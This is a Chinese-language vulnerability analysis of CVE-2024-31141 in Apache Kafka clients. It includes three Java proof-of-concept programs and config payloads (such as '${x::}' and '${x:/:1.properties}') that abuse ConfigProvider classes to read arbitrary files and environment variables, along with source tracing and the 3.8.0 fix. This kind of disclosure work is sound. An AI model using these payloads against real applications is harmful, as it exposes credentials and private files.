CVE-2024-31141 Apache Kafka Clients:Privilege escalation to filesystem read-access via automatic ConfigProvider
CVE-2024-31141: Apache Kafka Clients: Privilege escalation to filesystem read-access via automatic ConfigProvider
漏洞简介 Apache Kafka 客户端接受配置数据以自定义行为,并包含 ConfigProvider 插件以操作这些配置。 Apache Kafka 还提供 FileConfigProvider、DirectoryConfigProvider 和 EnvVarConfigProvider 实现,其中包括从磁盘或环境变量读取的功能。在 Apache Kafka 客户端配置可以由不受信任方指定的应用程序中,攻击者可以使用这些 ConfigProvider 读取磁盘和环境变量的任意内容。
此问题影响 Apache Kafka 客户端:从 2.3.0 到 3.5.2、3.6.2、3.7.0。
漏洞复现 根目录下创建1.properties文件
然后配置客户端连接的配置项,在真实场景下存在于kafka客户端可控自定义配置的场景
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 package org.example;import org.apache.kafka.clients.producer.KafkaProducer;import org.apache.kafka.clients.producer.Producer;import org.apache.kafka.common.config.provider.FileConfigProvider;import java.util.Properties;public class Test { public static void main (String[] args) { Properties providers = new Properties (); providers.put("bootstrap.servers" , "localhost:9092" ); providers.put("key.serializer" ,"org.apache.kafka.common.serialization.StringSerializer" ); providers.put("value.serializer" ,"org.apache.kafka.common.serialization.StringSerializer" ); providers.put("config.providers" , "x" ); providers.put("config.providers.x.class" , FileConfigProvider.class.getName()); providers.put("test" , "${x:/1.properties:password}" ); Producer<String, String> producer = new KafkaProducer <>(providers); producer.initTransactions(); } }
可以看到这里成功读取properties文件内容,存入到对象中,在后续处理或日志处理中可能会泄露出来
类似的还可以获取环境变量
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 package org.example;import org.apache.kafka.clients.producer.KafkaProducer;import org.apache.kafka.clients.producer.Producer;import org.apache.kafka.common.config.provider.EnvVarConfigProvider;import java.util.Properties;public class EnvVarConfigProviderTest { public static void main (String[] args) { Properties providers = new Properties (); providers.put("bootstrap.servers" , "localhost:9092" ); providers.put("key.serializer" ,"org.apache.kafka.common.serialization.StringSerializer" ); providers.put("value.serializer" ,"org.apache.kafka.common.serialization.StringSerializer" ); providers.put("config.providers" , "x" ); providers.put("config.providers.x.class" , EnvVarConfigProvider.class.getName()); providers.put("test" , "${x::USERDOMAIN_ROAMINGPROFILE}" ); Producer<String, String> producer = new KafkaProducer <>(providers); producer.initTransactions(); } }
DirectoryConfigProvider 本以为是可以列目录,结果是文件读取
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 package org.example;import org.apache.kafka.clients.producer.KafkaProducer;import org.apache.kafka.clients.producer.Producer;import org.apache.kafka.common.config.provider.DirectoryConfigProvider;import java.util.Properties;public class DirectoryConfigProviderTest { public static void main (String[] args) { Properties providers = new Properties (); providers.put("bootstrap.servers" , "localhost:9092" ); providers.put("key.serializer" ,"org.apache.kafka.common.serialization.StringSerializer" ); providers.put("value.serializer" ,"org.apache.kafka.common.serialization.StringSerializer" ); providers.put("config.providers" , "x" ); providers.put("config.providers.x.class" , DirectoryConfigProvider.class.getName()); providers.put("test" , "${x:/:1.properties}" ); Producer<String, String> producer = new KafkaProducer <>(providers); producer.initTransactions(); } }
漏洞分析 kafka/clients/src/main/java/org/apache/kafka/common/config/AbstractConfig.java at trunk · apache/kafka
根据漏洞通告可以发现和org.apache.kafka.automatic.config.providers
有关
在github的apache kafka仓库可以搜索到相关代码
跟踪AUTOMATIC_CONFIG_PROVIDERS_PROPERTY
,可以在这个附近找到很多的代码
kafka/clients/src/test/java/org/apache/kafka/common/config/AbstractConfigTest.java at trunk · apache/kafka
他们似乎都使用了${a:b:c}
的格式在读取配置项,因为很多文件路径形式
继续根据通告中所说的Apache Kafka also provides FileConfigProvider, DirectoryConfigProvider, and EnvVarConfigProvider implementations which include the ability to read from disk or environment variables.
结合源码看看实现
org.apache.kafka.common.config.provider.FileConfigProvider#get(java.lang.String, java.util.Set<java.lang.String>)
可以发现文件读取的位置
给这个类的函数加上断点调试
可以发现在实例化解析配置项过程中调用org.apache.kafka.common.config.AbstractConfig#instantiateConfigProviders
解析configProvider的内容
这里会调用provider.configure
方法,这里provider的类名指向FileConfigProvider
于是调用到org.apache.kafka.common.config.provider.FileConfigProvider#configure
无事发生,继续调试,可以发现调用了org.apache.kafka.common.config.ConfigTransformer#transform
来解析不是直接的变量,
可以发现满足这个正则匹配即可进行解析\$\{([^}]*?):(([^}]*?):)?([^}]*?)\}
${a:b:c}
被解析为了providerName
、path
、variable
调试到这里可以发现,调用到了文件读取的地方
类似的,获取环境变量这里主要分析org.apache.kafka.common.config.provider.EnvVarConfigProvider#get(java.lang.String, java.util.Set<java.lang.String>)
1 2 3 4 5 6 7 8 9 10 11 12 public ConfigData get (String path, Set<String> keys) { if (path != null && !path.isEmpty()) { log.error("Path is not supported for EnvVarConfigProvider, invalid value '{}'" , path); throw new ConfigException ("Path is not supported for EnvVarConfigProvider, invalid value '" + path + "'" ); } else if (keys == null ) { return new ConfigData (this .filteredEnvVarMap); } else { Map<String, String> filteredData = new HashMap (this .filteredEnvVarMap); filteredData.keySet().retainAll(keys); return new ConfigData (filteredData); } }
·根据这段代码逻辑可以看出,path要为空不然会报错退出,而keys不为空时则根据keys从环境变量中查找对应的环境变量,如果keys为空则返回所有环境变量,于是可以构造payload为${x::key_name}
或者${x::}
顺便提一嘴,这里EnvVarConfigProvider#configure
方法和FileConfigProvider#configure
倒是不太一样
1 2 3 4 5 6 7 8 9 10 11 12 13 public void configure (Map<String, ?> configs) { Pattern envVarPattern; if (configs.containsKey("allowlist.pattern" )) { envVarPattern = Pattern.compile(String.valueOf(configs.get("allowlist.pattern" ))); } else { envVarPattern = Pattern.compile(".*" ); log.info("No pattern for environment variables provided. Using default pattern '(.*)'." ); } this .filteredEnvVarMap = (Map)this .envVarMap.entrySet().stream().filter((envVar) -> { return envVarPattern.matcher((CharSequence)envVar.getKey()).matches(); }).collect(Collectors.toMap(Map.Entry::getKey, Map.Entry::getValue)); }
可以用来限制允许获取的环境变量
继续分析org.apache.kafka.common.config.provider.DirectoryConfigProvider#get(java.lang.String, java.util.function.Predicate<java.nio.file.Path>)
可以发现这个感觉更厉害,经过调试加尝试可以发现${a:b:c}
的格式被解析为${providerName:path:filename}
,并且可以读取任意文件内容,而不是局限于类似properties文件的键值对内容
跟踪到org.apache.kafka.common.config.provider.DirectoryConfigProvider#read
方法即可发现文件读取
漏洞修复 在3.8.0版本中在configure
方法处加了白名单限制
1 2 3 public void configure (Map<String, ?> configs) { allowedPaths = new AllowedPaths ((String) configs.getOrDefault(ALLOWED_PATHS_CONFIG, null )); }
建议使用受影响应用程序的用户将kafka客户端升级到版本>=3.8.0
,并设置JVM系统属 性org.apache.kafka.automatic.config providers=none
。
后记 感觉直接漏洞利用难度还是很苛刻的,就看怎么泄露出存入的配置信息了